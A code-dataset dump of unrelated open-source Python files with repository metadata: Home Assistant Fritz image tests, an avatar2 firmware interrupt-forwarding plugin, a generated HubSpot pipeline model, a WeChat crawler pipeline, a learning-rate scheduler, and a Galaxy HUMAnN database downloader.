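print(pulp.LpStatus[toy.status], pulp.value(total))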
|
334973f8dd925830870712b1d74f843d12e53f7d
|
f8a2dfa9f6f1fec00863ab054b3874e71374c605
|
/urduhack/pipeline/__init__.py
|
1c06981152e9896b6c97afbca925dbc93f26fadc
|
[
"MIT"
] |
permissive
|
urduhack/urduhack
|
eff6164c1e1135963b44b8b75ab75a7239d6ffd0
|
f7f0aa26ef516ce7907429dff0863577190beca7
|
refs/heads/master
| 2023-05-10T19:25:25.761716
| 2023-04-27T07:01:48
| 2023-04-27T07:01:48
| 163,254,580
| 285
| 44
|
MIT
| 2023-04-27T07:01:49
| 2018-12-27T06:11:05
|
Python
|
UTF-8
|
Python
| false
| false
| 65
|
py
|
__init__.py
|
# coding: utf8
"""Pipeline module"""
from .core import Pipeline
|
48cc6d25492ab36554a234abc67a26c5f5ca0e05
|
96dcea595e7c16cec07b3f649afd65f3660a0bad
|
/tests/components/fritz/test_image.py
|
cbcbded56920af84d57e85006973f2f36482b672
|
[
"Apache-2.0"
] |
permissive
|
home-assistant/core
|
3455eac2e9d925c92d30178643b1aaccf3a6484f
|
80caeafcb5b6e2f9da192d0ea6dd1a5b8244b743
|
refs/heads/dev
| 2023-08-31T15:41:06.299469
| 2023-08-31T14:50:53
| 2023-08-31T14:50:53
| 12,888,993
| 35,501
| 20,617
|
Apache-2.0
| 2023-09-14T21:50:15
| 2013-09-17T07:29:48
|
Python
|
UTF-8
|
Python
| false
| false
| 5,499
|
py
|
test_image.py
|
"""Tests for Fritz!Tools image platform."""
from datetime import timedelta
from http import HTTPStatus
from unittest.mock import patch
import pytest
from syrupy.assertion import SnapshotAssertion
from homeassistant.components.fritz.const import DOMAIN
from homeassistant.components.image import DOMAIN as IMAGE_DOMAIN
from homeassistant.config_entries import ConfigEntryState
from homeassistant.const import Platform
from homeassistant.core import HomeAssistant
from homeassistant.helpers.entity_registry import async_get as async_get_entity_registry
from homeassistant.setup import async_setup_component
from homeassistant.util.dt import utcnow
from .const import MOCK_FB_SERVICES, MOCK_USER_DATA
from tests.common import MockConfigEntry, async_fire_time_changed
from tests.typing import ClientSessionGenerator
GUEST_WIFI_ENABLED: dict[str, dict] = {
"WLANConfiguration0": {},
"WLANConfiguration1": {
"GetInfo": {
"NewEnable": True,
"NewStatus": "Up",
"NewSSID": "GuestWifi",
"NewBeaconType": "11iandWPA3",
"NewX_AVM-DE_PossibleBeaconTypes": "None,11i,11iandWPA3",
"NewStandard": "ax",
"NewBSSID": "1C:ED:6F:12:34:13",
},
"GetSSID": {
"NewSSID": "GuestWifi",
},
"GetSecurityKeys": {"NewKeyPassphrase": "1234567890"},
},
}
GUEST_WIFI_CHANGED: dict[str, dict] = {
"WLANConfiguration0": {},
"WLANConfiguration1": {
"GetInfo": {
"NewEnable": True,
"NewStatus": "Up",
"NewSSID": "GuestWifi",
"NewBeaconType": "11iandWPA3",
"NewX_AVM-DE_PossibleBeaconTypes": "None,11i,11iandWPA3",
"NewStandard": "ax",
"NewBSSID": "1C:ED:6F:12:34:13",
},
"GetSSID": {
"NewSSID": "GuestWifi",
},
"GetSecurityKeys": {"NewKeyPassphrase": "abcdefghij"},
},
}
GUEST_WIFI_DISABLED: dict[str, dict] = {
"WLANConfiguration0": {},
"WLANConfiguration1": {
"GetInfo": {
"NewEnable": False,
"NewStatus": "Up",
"NewSSID": "GuestWifi",
"NewBeaconType": "11iandWPA3",
"NewX_AVM-DE_PossibleBeaconTypes": "None,11i,11iandWPA3",
"NewStandard": "ax",
"NewBSSID": "1C:ED:6F:12:34:13",
},
"GetSSID": {
"NewSSID": "GuestWifi",
},
"GetSecurityKeys": {"NewKeyPassphrase": "1234567890"},
},
}
@pytest.mark.parametrize(
("fc_data"),
[
({**MOCK_FB_SERVICES, **GUEST_WIFI_ENABLED}),
({**MOCK_FB_SERVICES, **GUEST_WIFI_DISABLED}),
],
)
async def test_image_entity(
hass: HomeAssistant,
hass_client: ClientSessionGenerator,
snapshot: SnapshotAssertion,
fc_class_mock,
fh_class_mock,
) -> None:
"""Test image entity."""
# setup component with image platform only
with patch(
"homeassistant.components.fritz.PLATFORMS",
[Platform.IMAGE],
):
entry = MockConfigEntry(domain=DOMAIN, data=MOCK_USER_DATA)
entry.add_to_hass(hass)
assert await async_setup_component(hass, DOMAIN, {})
await hass.async_block_till_done()
assert entry.state == ConfigEntryState.LOADED
# test image entity is generated as expected
states = hass.states.async_all(IMAGE_DOMAIN)
assert len(states) == 1
state = states[0]
assert state.name == "Mock Title GuestWifi"
assert state.entity_id == "image.mock_title_guestwifi"
access_token = state.attributes["access_token"]
assert state.attributes == {
"access_token": access_token,
"entity_picture": f"/api/image_proxy/image.mock_title_guestwifi?token={access_token}",
"friendly_name": "Mock Title GuestWifi",
}
entity_registry = async_get_entity_registry(hass)
entity_entry = entity_registry.async_get("image.mock_title_guestwifi")
assert entity_entry.unique_id == "1c_ed_6f_12_34_11_guestwifi_qr_code"
# test image download
client = await hass_client()
resp = await client.get("/api/image_proxy/image.mock_title_guestwifi")
assert resp.status == HTTPStatus.OK
body = await resp.read()
assert body == snapshot
@pytest.mark.parametrize(("fc_data"), [({**MOCK_FB_SERVICES, **GUEST_WIFI_ENABLED})])
async def test_image_update(
hass: HomeAssistant,
hass_client: ClientSessionGenerator,
snapshot: SnapshotAssertion,
fc_class_mock,
fh_class_mock,
) -> None:
"""Test image update."""
# setup component with image platform only
with patch(
"homeassistant.components.fritz.PLATFORMS",
[Platform.IMAGE],
):
entry = MockConfigEntry(domain=DOMAIN, data=MOCK_USER_DATA)
entry.add_to_hass(hass)
assert await async_setup_component(hass, DOMAIN, {})
await hass.async_block_till_done()
assert entry.state == ConfigEntryState.LOADED
client = await hass_client()
resp = await client.get("/api/image_proxy/image.mock_title_guestwifi")
resp_body = await resp.read()
assert resp.status == HTTPStatus.OK
fc_class_mock().override_services({**MOCK_FB_SERVICES, **GUEST_WIFI_CHANGED})
async_fire_time_changed(hass, utcnow() + timedelta(seconds=60))
await hass.async_block_till_done()
resp = await client.get("/api/image_proxy/image.mock_title_guestwifi")
resp_body_new = await resp.read()
assert resp_body != resp_body_new
assert resp_body_new == snapshot
|
8a478cc09afbff9c3d89c382988ae8954d4368bd
|
3f763cf893b09a3be562858613c928703ff349e4
|
/client/verta/verta/_vendored/__init__.py
|
04fbc04b03fc25a9e6bcc83ba933105501e593c4
|
[
"Apache-2.0"
] |
permissive
|
VertaAI/modeldb
|
636e46fc025b01a514d599b10e228c8735503357
|
ec9ac7712500adb13fd815dfd476ce9f536c6921
|
refs/heads/main
| 2023-08-31T00:45:37.220628
| 2023-08-30T18:45:13
| 2023-08-30T18:45:13
| 71,305,435
| 844
| 142
|
Apache-2.0
| 2023-09-14T19:24:13
| 2016-10-19T01:07:26
|
Java
|
UTF-8
|
Python
| false
| false
| 77
|
py
|
__init__.py
|
"""
.. versionchanged:: 0.24.0
Moved here from ``verta.external``.
"""
|
2da91d7df0532ed56c51c406dfa9d2ad54db7330
|
35ffbadf2f410ba8a195271af28ee2804121661f
|
/avatar2/plugins/arm/armv7m_interrupts.py
|
2ed860f2d28be6042e6f0a370678317605387866
|
[
"Apache-2.0"
] |
permissive
|
avatartwo/avatar2
|
08799f13fd416c24eef374333e87eaa831573f60
|
a2d06c9313db55f11a10579c8a45d05b025fa9ea
|
refs/heads/main
| 2023-08-29T21:17:23.962466
| 2023-03-21T16:33:07
| 2023-03-21T16:33:07
| 94,234,201
| 498
| 118
|
Apache-2.0
| 2023-03-21T16:33:09
| 2017-06-13T16:31:51
|
Python
|
UTF-8
|
Python
| false
| false
| 7,402
|
py
|
armv7m_interrupts.py
|
from types import MethodType
from threading import Thread, Event, Condition
from avatar2 import TargetStates
from avatar2.archs import ARMV7M
from avatar2.protocols.coresight import CoreSightProtocol
from avatar2.protocols.armv7m_interrupt import ARMV7MInterruptProtocol
from avatar2.targets import OpenOCDTarget, QemuTarget
from avatar2.watchmen import AFTER
from avatar2.message import RemoteInterruptEnterMessage
from avatar2.message import RemoteInterruptExitMessage
from avatar2.message import RemoteMemoryWriteMessage
from avatar2.message import BreakpointHitMessage
from avatar2.watchmen import watch
def add_protocols(self, **kwargs):
target = kwargs['watched_target']
if isinstance(target, OpenOCDTarget):
target.protocols.interrupts = CoreSightProtocol(target.avatar,
target)
# We want to remove the decorators around the read_memory function of
# this target, to allow reading while it is running (thanks oocd)
target.read_memory = MethodType( lambda t, *args, **kwargs:
t.protocols.memory.read_memory(
*args, **kwargs), target
)
# Also, let's use openocd as protocol for register and memory
target.protocols.memory = target.protocols.monitor
target.protocols.register = target.protocols.monitor
if isinstance(target, QemuTarget):
target.protocols.interrupts = ARMV7MInterruptProtocol(
target, self.v7m_irq_rx_queue_name, self.v7m_irq_tx_queue_name
)
def forward_interrupt(self, message): # , **kwargs):
global stawp
target = message.origin
target.update_state(message.state)
self.queue.put(message)
if isinstance(target, OpenOCDTarget):
if message.address == message.origin.protocols.interrupts._monitor_stub_isr - 1:
xpsr = target.read_register('xPSR')
irq_num = xpsr & 0xff
self.log.info("Injecting IRQ 0x%x" % irq_num)
self._irq_dst.protocols.interrupts.inject_interrupt(irq_num)
def continue_execution(self, message, **kwargs):
target = message.origin
if message.address == message.origin.protocols.interrupts._monitor_stub_isr - 1:
target.cont()
def enable_interrupt_forwarding(self, from_target, to_target=None,
disabled_irqs=None, semi_forwarding=False):
"""
Semi-forwarding is a special mode developed for pretender.
It allows IRQs to be taken from from_target as well as from external
calls to inject_interrupt. However, no information about to_target's
IRQ state is
given back to from_target. Nevertheless, memory requests from to_target to
from_target are forwarded.
Confused yet? So are we, this is a huge hack.
"""
self._irq_src = from_target
self._irq_dst = to_target
self._irq_semi_forwarding = semi_forwarding
self._irq_ignore = [] if disabled_irqs is None else disabled_irqs
self._handle_remote_interrupt_enter_message = MethodType(
_handle_remote_interrupt_enter_message, self)
self._handle_remote_interrupt_exit_message = MethodType(
_handle_remote_interrupt_exit_message, self)
self._handle_remote_memory_write_message_nvic = MethodType(
_handle_remote_memory_write_message_nvic, self)
self.message_handlers.update(
{
RemoteInterruptEnterMessage: self._handle_remote_interrupt_enter_message,
RemoteInterruptExitMessage: self._handle_remote_interrupt_exit_message}
)
self.message_handlers.update(
{
RemoteMemoryWriteMessage: self._handle_remote_memory_write_message_nvic}
)
if from_target:
from_target.protocols.interrupts.enable_interrupts()
isr_addr = from_target.protocols.interrupts._monitor_stub_isr - 1
self.log.info("ISR breakpoint at %#08x" % isr_addr)
from_target.set_breakpoint(isr_addr, hardware=True)
if to_target:
to_target.protocols.interrupts.enable_interrupts()
# OpenOCDProtocol does not emit breakpointhitmessages currently,
# So we listen on state-updates and figure out the rest on our own
# self.watchmen.add_watchman('BreakpointHit', when=AFTER,
# callback=continue_execution)
self._handle_breakpoint_handler = MethodType(forward_interrupt, self)
self.fast_queue_listener.message_handlers.update({
BreakpointHitMessage: self._handle_breakpoint_handler
}
)
# def _fast_handle_update_state_message(self, message):
# print message
# message.origin.update_state(message.state)
# self.avatar.queue.put(message)
@watch('RemoteInterruptEnter')
def _handle_remote_interrupt_enter_message(self, message):
self._irq_dst.protocols.interrupts.send_interrupt_enter_response(message.id,
True)
if self._irq_src is None or self._irq_semi_forwarding is True:
return
status = self._irq_src.get_status()
if status['state'] == TargetStates.STOPPED:
self.log.info("Target stopped, restarting " + repr(message.origin))
try:
self._irq_src.cont(blocking=False)
except:
self.log.exception(" ")
@watch('RemoteInterruptExit')
def _handle_remote_interrupt_exit_message(self, message):
"""
Handle an interrupt exiting properly
If the interrupt was trigged by the hardware, we need to tell the
interrupt that we satisified it
:param self:
:param message:
:return:
"""
if self._irq_src is not None and self._irq_semi_forwarding is False:
# We are forwarding, make sure to forward the return
self._irq_src.protocols.interrupts.inject_exc_return(
message.transition_type)
# Always ack the exit message
self._irq_dst.protocols.interrupts.send_interrupt_exit_response(message.id,
True)
def _handle_remote_memory_write_message_nvic(self, message):
# NVIC address according to coresight manual
if message.address < 0xe000e000 or message.address > 0xe000f000 or self._irq_src is None:
return self._handle_remote_memory_write_message(message)
# Discard writes to the vector table offset registers
# TODO add other blacklists
if message.address == 0xE000ED08:
success = True
else:
success = self._irq_src.write_memory(message.address,
message.size,
message.value)
message.origin.protocols.remote_memory.send_response(message.id, 0,
success)
return message.id, message.value, success
def load_plugin(avatar):
if avatar.arch != ARMV7M:
avatar.log.error("Tried to load armv7-m interrupt plugin " +
"with mismatching architecture")
avatar.v7m_irq_rx_queue_name = '/avatar_v7m_irq_rx_queue'
avatar.v7m_irq_tx_queue_name = '/avatar_v7m_irq_tx_queue'
avatar.enable_interrupts = MethodType(enable_interrupt_forwarding, avatar)
avatar.watchmen.add_watchman('TargetInit', when=AFTER,
callback=add_protocols)
|
0bcb98cb77c4d644ac84b8978e1b458fc6d42a50
|
119646d6e1f13582c577fd7b87c9654839a0b806
|
/hubspot/crm/pipelines/models/pipeline_stage_patch_input.py
|
2a7e788e93eb0cb7c61132a45508503c785dc9e8
|
[] |
permissive
|
HubSpot/hubspot-api-python
|
446daaceeb3a6ce27edcd0414603c6d4bc07e327
|
d51a64c413461c0b82d8a41743e752d878747ca1
|
refs/heads/master
| 2023-08-31T09:52:56.583803
| 2023-08-07T11:00:27
| 2023-08-07T11:00:27
| 248,865,684
| 227
| 98
|
Apache-2.0
| 2023-09-14T15:25:19
| 2020-03-20T22:41:24
|
Python
|
UTF-8
|
Python
| false
| false
| 8,127
|
py
|
pipeline_stage_patch_input.py
|
# coding: utf-8
"""
CRM Pipelines
Pipelines represent distinct stages in a workflow, like closing a deal or servicing a support ticket. These endpoints provide access to read and modify pipelines in HubSpot. Pipelines support `deals` and `tickets` object types. ## Pipeline ID validation When calling endpoints that take pipelineId as a parameter, that ID must correspond to an existing, un-archived pipeline. Otherwise the request will fail with a `404 Not Found` response. # noqa: E501
The version of the OpenAPI document: v3
Generated by: https://openapi-generator.tech
"""
try:
from inspect import getfullargspec
except ImportError:
from inspect import getargspec as getfullargspec
import pprint
import re # noqa: F401
import six
from hubspot.crm.pipelines.configuration import Configuration
class PipelineStagePatchInput(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {"label": "str", "archived": "bool", "display_order": "int", "metadata": "dict[str, str]"}
attribute_map = {"label": "label", "archived": "archived", "display_order": "displayOrder", "metadata": "metadata"}
def __init__(self, label=None, archived=None, display_order=None, metadata=None, local_vars_configuration=None): # noqa: E501
"""PipelineStagePatchInput - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration.get_default_copy()
self.local_vars_configuration = local_vars_configuration
self._label = None
self._archived = None
self._display_order = None
self._metadata = None
self.discriminator = None
if label is not None:
self.label = label
if archived is not None:
self.archived = archived
if display_order is not None:
self.display_order = display_order
self.metadata = metadata
@property
def label(self):
"""Gets the label of this PipelineStagePatchInput. # noqa: E501
A label used to organize pipeline stages in HubSpot's UI. Each pipeline stage's label must be unique within that pipeline. # noqa: E501
:return: The label of this PipelineStagePatchInput. # noqa: E501
:rtype: str
"""
return self._label
@label.setter
def label(self, label):
"""Sets the label of this PipelineStagePatchInput.
A label used to organize pipeline stages in HubSpot's UI. Each pipeline stage's label must be unique within that pipeline. # noqa: E501
:param label: The label of this PipelineStagePatchInput. # noqa: E501
:type label: str
"""
self._label = label
@property
def archived(self):
"""Gets the archived of this PipelineStagePatchInput. # noqa: E501
Whether the pipeline is archived. # noqa: E501
:return: The archived of this PipelineStagePatchInput. # noqa: E501
:rtype: bool
"""
return self._archived
@archived.setter
def archived(self, archived):
"""Sets the archived of this PipelineStagePatchInput.
Whether the pipeline is archived. # noqa: E501
:param archived: The archived of this PipelineStagePatchInput. # noqa: E501
:type archived: bool
"""
self._archived = archived
@property
def display_order(self):
"""Gets the display_order of this PipelineStagePatchInput. # noqa: E501
The order for displaying this pipeline stage. If two pipeline stages have a matching `displayOrder`, they will be sorted alphabetically by label. # noqa: E501
:return: The display_order of this PipelineStagePatchInput. # noqa: E501
:rtype: int
"""
return self._display_order
@display_order.setter
def display_order(self, display_order):
"""Sets the display_order of this PipelineStagePatchInput.
The order for displaying this pipeline stage. If two pipeline stages have a matching `displayOrder`, they will be sorted alphabetically by label. # noqa: E501
:param display_order: The display_order of this PipelineStagePatchInput. # noqa: E501
:type display_order: int
"""
self._display_order = display_order
@property
def metadata(self):
"""Gets the metadata of this PipelineStagePatchInput. # noqa: E501
A JSON object containing properties that are not present on all object pipelines. For `deals` pipelines, the `probability` field is required (`{ \"probability\": 0.5 }`), and represents the likelihood a deal will close. Possible values are between 0.0 and 1.0 in increments of 0.1. For `tickets` pipelines, the `ticketState` field is optional (`{ \"ticketState\": \"OPEN\" }`), and represents whether the ticket remains open or has been closed by a member of your Support team. Possible values are `OPEN` or `CLOSED`. # noqa: E501
:return: The metadata of this PipelineStagePatchInput. # noqa: E501
:rtype: dict[str, str]
"""
return self._metadata
@metadata.setter
def metadata(self, metadata):
"""Sets the metadata of this PipelineStagePatchInput.
A JSON object containing properties that are not present on all object pipelines. For `deals` pipelines, the `probability` field is required (`{ \"probability\": 0.5 }`), and represents the likelihood a deal will close. Possible values are between 0.0 and 1.0 in increments of 0.1. For `tickets` pipelines, the `ticketState` field is optional (`{ \"ticketState\": \"OPEN\" }`), and represents whether the ticket remains open or has been closed by a member of your Support team. Possible values are `OPEN` or `CLOSED`. # noqa: E501
:param metadata: The metadata of this PipelineStagePatchInput. # noqa: E501
:type metadata: dict[str, str]
"""
if self.local_vars_configuration.client_side_validation and metadata is None: # noqa: E501
raise ValueError("Invalid value for `metadata`, must not be `None`") # noqa: E501
self._metadata = metadata
def to_dict(self, serialize=False):
"""Returns the model properties as a dict"""
result = {}
def convert(x):
if hasattr(x, "to_dict"):
args = getfullargspec(x.to_dict).args
if len(args) == 1:
return x.to_dict()
else:
return x.to_dict(serialize)
else:
return x
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
attr = self.attribute_map.get(attr, attr) if serialize else attr
if isinstance(value, list):
result[attr] = list(map(lambda x: convert(x), value))
elif isinstance(value, dict):
result[attr] = dict(map(lambda item: (item[0], convert(item[1])), value.items()))
else:
result[attr] = convert(value)
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, PipelineStagePatchInput):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, PipelineStagePatchInput):
return True
return self.to_dict() != other.to_dict()
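# --- Usage sketch (illustrative addition, not part of the generated module) ---
# Builds a patch payload for a deals pipeline stage; the label, order, and
# probability values below are arbitrary examples. Field names follow the
# attribute_map defined above.
if __name__ == "__main__":
stage_patch = PipelineStagePatchInput(
label="Contract sent",
display_order=3,
metadata={"probability": "0.5"},
)
# Serialized keys use the JSON names, e.g. 'displayOrder' instead of
# 'display_order'.
print(stage_patch.to_dict(serialize=True))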
|
eb02b29fadb92ac2c56eb66a785da265c76668a3
|
46732d613208ee4096fbbd3fd74f22146471d1ce
|
/weixin_crawler/project/crawler/crawler/pipelines/load_more.py
|
32c2ec8f94200c75033e0cd81c7a1e5d2f3abc06
|
[] |
no_license
|
cassieeric/python_crawler
|
7cb02f612382801ae024e2cee70e0c2bcdba927c
|
6d2b4db3d34183d729f6fd30555c6d6f04514260
|
refs/heads/master
| 2022-11-30T20:30:50.031960
| 2022-11-27T02:53:22
| 2022-11-27T02:53:22
| 118,204,154
| 322
| 283
| null | 2022-12-21T09:33:08
| 2018-01-20T03:17:14
|
HTML
|
UTF-8
|
Python
| false
| false
| 783
|
py
|
load_more.py
|
from db import update_article_from_template
from db import insert_many
class ResponseArticleListPipeline(object):
def __init__(self):
pass
def open_spider(self, spider):
pass
def process_item(self, item, spider):
article_list = item['article_list']
nickname = item['nickname']
tidy_article_list = []
for article in article_list:
tidy_article_list.append(update_article_from_template(article))
print(nickname,tidy_article_list)
has_update = insert_many(nickname, tidy_article_list)
if has_update == True:
print("文章列表已经最新")
spider.crawler.engine.close_spider(spider, '文章列表已经最新')
def close_spider(self, spider):
pass
|
b48f52f4b542d628543b0c37013e5c761b46c5f7
|
379ad926bb76a7732f5d43e15cc5b254ad608a8a
|
/profiler/translation/seq2seq/train/lr_scheduler.py
|
999f642c99e1f19e9e3ad1d3a9d0610982d5c58c
|
[
"MIT"
] |
permissive
|
msr-fiddle/pipedream
|
ed5ff9a823779ba63b64edc8955edc88b989e381
|
7db6a1c3e64996d5b319faec6ca38cb31bfea1c4
|
refs/heads/pipedream
| 2022-11-20T21:35:17.056988
| 2021-07-22T18:59:30
| 2021-07-22T18:59:30
| 203,689,837
| 356
| 125
|
MIT
| 2022-11-04T14:51:26
| 2019-08-22T01:18:23
|
Python
|
UTF-8
|
Python
| false
| false
| 1,731
|
py
|
lr_scheduler.py
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import torch
import math
class WarmupMultiStepLR(torch.optim.lr_scheduler._LRScheduler):
def __init__(
self,
optimizer,
lr_method="mlperf",
warmup_iters=100,
remain_steps=600,
decay_steps=100,
last_epoch=-1,
):
if lr_method not in ("none", "mlperf"):
raise ValueError(
"Only 'none' or 'mlperf' warmup_method accepted"
"got {}".format(lr_method)
)
self.lr_method = lr_method
self.warmup_iters = warmup_iters # iterations before it reaches base LR
self.remain_steps = remain_steps # iteration at which decay starts
self.decay_steps = decay_steps # number of steps between each decay
super(WarmupMultiStepLR, self).__init__(optimizer, last_epoch)
def get_lr(self):
if self.lr_method == "none":
return [base_lr for base_lr in self.base_lrs]
elif self.last_epoch <= self.warmup_iters:
# MLPerf warmup Inspired by https://arxiv.org/pdf/1706.03762.pdf (Section 5.3)
warmup_factor = math.exp(math.log(0.01) / self.warmup_iters)
inv_decay = warmup_factor ** (self.warmup_iters - self.last_epoch)
return [base_lr * inv_decay for base_lr in self.base_lrs]
elif self.last_epoch >= self.remain_steps:
num_decay_steps = min(int((self.last_epoch - self.remain_steps) / self.decay_steps) + 1, 4)
return [
base_lr * (0.5 ** num_decay_steps)
for base_lr in self.base_lrs
]
else:
return [base_lr for base_lr in self.base_lrs]
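# --- Usage sketch (illustrative addition, not part of the original module) ---
# Drives the scheduler with a throw-away model/optimizer to show the
# exponential warmup followed by stepwise decay. All hyper-parameters below
# are arbitrary; get_last_lr() assumes a reasonably recent PyTorch.
if __name__ == "__main__":
model = torch.nn.Linear(4, 2)
optimizer = torch.optim.SGD(model.parameters(), lr=2.0)
scheduler = WarmupMultiStepLR(
optimizer, lr_method="mlperf", warmup_iters=10, remain_steps=50, decay_steps=20
)
for step in range(80):
optimizer.step()
scheduler.step()
if step % 10 == 0:
print(step, scheduler.get_last_lr())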
|
b7807574f8123cd437f6c29b61eec9623f75f8a2
|
977f7a7386899a5d0152b29b57ec26682b430437
|
/data_managers/data_manager_humann_database_downloader/data_manager/data_manager_humann_download.py
|
6723922b5c1e3e9932da270542096d627930a027
|
[
"MIT"
] |
permissive
|
galaxyproject/tools-iuc
|
0b87e21e1cb075ca6dc6b12622bc4e538a7c6507
|
96f8a533278b4b6394aebd7a8f537513b0d29b1a
|
refs/heads/main
| 2023-08-31T16:14:34.563541
| 2023-08-31T04:31:22
| 2023-08-31T04:31:22
| 23,992,530
| 164
| 508
|
MIT
| 2023-09-13T19:41:14
| 2014-09-13T11:18:49
|
HTML
|
UTF-8
|
Python
| false
| false
| 8,023
|
py
|
data_manager_humann_download.py
|
#!/usr/bin/env python
#
# Data manager for reference data for the 'humann' Galaxy tools
import argparse
import json
import subprocess
from datetime import date
from pathlib import Path
HUMANN_REFERENCE_DATA = {
"chocophlan": {
"full": "Full ChocoPhlAn for HUManN",
"DEMO": "Demo ChocoPhlAn for HUManN"
},
"uniref": {
"uniref50_diamond": "Full UniRef50 for HUManN",
"uniref50_ec_filtered_diamond": "EC-filtered UniRef50 for HUManN",
"uniref90_diamond": "Full UniRef90 for HUManN",
"uniref90_ec_filtered_diamond": "EC-filtered UniRef90 for HUManN",
"DEMO_diamond": "Demo UniRef for HUManN"
},
"utility_mapping": {
"full": {
"map_uniref50_uniref90": "Mapping (full) for UniRef50 from UniRef90",
"map_ko_uniref90": "Mapping (full) for KEGG Orthogroups (KOs) from UniRef90",
"map_eggnog_name": "Mapping (full) between EggNOG (including COGs) ids and names",
"map_uniref90_name": "Mapping (full) between UniRef90 ids and names",
"map_go_uniref90": "Mapping (full) for Gene Ontology (GO) from UniRef90",
"uniref90-tol-lca": "Mapping (full) for LCA for UniRef90",
"uniref50-tol-lca": "Mapping (full) for LCA for UniRef50",
"map_eggnog_uniref50": "Mapping (full) for EggNOG (including COGs) from UniRef50",
"map_pfam_uniref90": "Mapping (full) for Pfam domains from UniRef90",
"map_go_uniref50": "Mapping (full) for Gene Ontology (GO) from UniRef50",
"map_ko_name": "Mapping (full) between KEGG Orthogroups (KOs) ids and names",
"map_level4ec_uniref90": "Mapping (full) for Level-4 enzyme commission (EC) categories from UniRef90",
"map_go_name": "Mapping (full) between Gene Ontology (GO) ids and names",
"map_ko_uniref50": "Mapping (full) for KEGG Orthogroups (KOs) from UniRef50",
"map_level4ec_uniref50": "Mapping (full) for Level-4 enzyme commission (EC) categories from UniRef90",
"map_pfam_uniref50": "Mapping (full) for Pfam domains from UniRef50",
"map_eggnog_uniref90": "Mapping (full) for EggNOG (including COGs) from UniRef90",
"map_uniref50_name": "Mapping (full) between UniRef50 ids and names",
"map_ec_name": "Mapping (full) between Level-4 enzyme commission (EC) categories ids and names",
"map_pfam_name": "Mapping (full) between Pfam domains ids and names"
}
}
}
# Utility functions for interacting with Galaxy JSON
def read_input_json(json_fp):
"""Read the JSON supplied from the data manager tool
Returns a tuple (param_dict,extra_files_path)
'param_dict' is an arbitrary dictionary of parameters
input into the tool; 'extra_files_path' is the path
to a directory where output files must be put for the
receiving data manager to pick them up.
NB the directory pointed to by 'extra_files_path'
doesn't exist initially, it is the job of the script
to create it if necessary.
"""
with open(json_fp) as fh:
params = json.load(fh)
return (params['param_dict'],
Path(params['output_data'][0]['extra_files_path']))
# Utility functions for creating data table dictionaries
#
# Example usage:
# >>> d = create_data_tables_dict()
# >>> add_data_table(d,'my_data')
# >>> add_data_table_entry(d, 'my_data', dict(dbkey='hg19', value='human'))
# >>> add_data_table_entry(d, 'my_data', dict(dbkey='mm9', value='mouse'))
# >>> print(json.dumps(d))
def create_data_tables_dict():
"""Return a dictionary for storing data table information
Returns a dictionary that can be used with 'add_data_table'
and 'add_data_table_entry' to store information about a
data table. It can be converted to JSON to be sent back to
the data manager.
"""
d = {
'data_tables': {}
}
return d
def add_data_table(d, table):
"""Add a data table to the data tables dictionary
Creates a placeholder for a data table called 'table'.
"""
d['data_tables'][table] = []
def add_data_table_entry(d, table, entry):
"""Add an entry to a data table
Appends an entry to the data table 'table'. 'entry'
should be a dictionary where the keys are the names of
columns in the data table.
Raises an exception if the named data table doesn't
exist.
"""
try:
d['data_tables'][table].append(entry)
except KeyError:
raise Exception("add_data_table_entry: no table '%s'" % table)
def download_humann_db(data_tables, table_name, database, build, version, target_dp):
"""Download HUMAnN database
Creates references to the specified file(s) on the Galaxy
server in the appropriate data table (determined from the
file extension).
The 'data_tables' dictionary should have been created using
the 'create_data_tables_dict' and 'add_data_table' functions.
Arguments:
data_tables: a dictionary containing the data table info
table_name: name of the table
database: database to download (chocophlan or uniref)
build: build of the database to download
version: tool version
target_dp: directory to put copy or link to the data file
"""
db_target_dp = target_dp / Path(database)
db_dp = db_target_dp / Path(database)
build_target_dp = db_target_dp / Path(build)
# launch tool to get db
cmd = "humann_databases --download %s %s %s --update-config no" % (
database,
build,
db_target_dp)
subprocess.check_call(cmd, shell=True)
# move db
db_dp.rename(build_target_dp)
# add details to data table
if database != "utility_mapping":
add_data_table_entry(
data_tables,
table_name,
dict(
value="%s-%s-%s-%s" % (database, build, version, date.today().strftime("%d%m%Y")),
name=HUMANN_REFERENCE_DATA[database][build],
dbkey=version,
path=str(build_target_dp)))
elif args.database == "utility_mapping":
for x in build_target_dp.iterdir():
name = str(x.stem).split('.')[0]
add_data_table_entry(
data_tables,
table_name,
dict(
value="%s-%s-%s-%s-%s%s" % (database, build, name, version, date.today().strftime("%d%m%Y"), x.suffix),
name=HUMANN_REFERENCE_DATA["utility_mapping"][build][name],
dbkey=version,
path=str(x)))
if __name__ == "__main__":
print("Starting...")
# Read command line
parser = argparse.ArgumentParser(description='Download HUMAnN database')
parser.add_argument('--database', help="Database name")
parser.add_argument('--build', help="Build of the database")
parser.add_argument('--version', help="HUMAnN version")
parser.add_argument('--json', help="Path to JSON file")
args = parser.parse_args()
print("args : %s" % args)
# Read the input JSON
json_fp = Path(args.json)
params, target_dp = read_input_json(json_fp)
# Make the target directory
print("Making %s" % target_dp)
target_dp.mkdir(parents=True, exist_ok=True)
# Set up data tables dictionary
data_tables = create_data_tables_dict()
if args.database == "chocophlan":
table_name = 'humann_nucleotide_database'
elif args.database == "uniref":
table_name = 'humann_protein_database'
elif args.database == "utility_mapping":
table_name = 'humann_utility_mapping'
add_data_table(data_tables, table_name)
# Fetch data from specified data sources
print("Download and build database")
download_humann_db(
data_tables,
table_name,
args.database,
args.build,
args.version,
target_dp)
# Write output JSON
print("Outputting JSON")
with open(json_fp, 'w') as fh:
json.dump(data_tables, fh, sort_keys=True)
print("Done.")
|
8927fd7fa8b0bd1865f43c9b0995a06435a9bc14
|
7b7c570b30d6d7a0e9b904c7cb378cfb0d0f0e07
|
